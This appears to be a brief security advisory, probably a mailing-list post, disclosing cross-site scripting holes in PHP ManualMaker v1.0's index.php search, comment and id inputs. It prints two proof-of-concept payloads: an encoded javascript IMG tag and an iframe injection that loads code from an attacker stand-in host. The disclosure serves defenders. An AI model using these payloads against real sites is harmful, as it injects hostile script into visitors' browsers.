PHP ManualMaker v1.0

Homepage:

http://deltascripts.com/phpmanualmaker/


Effected files:

index.php

Search boxes

Comment boxes


XSS proof of concept:


Input in search or comment box:

">">">'><IMG SRC=javascript:alert(&#0000039XSS&#0000039)><""><'<"


XSS via URL injection of id:

http://www.example.com/manualmaker/index.php?print=1&id=<iframe 
src=http://evilsite.com/evilcode.html <

Reply via email to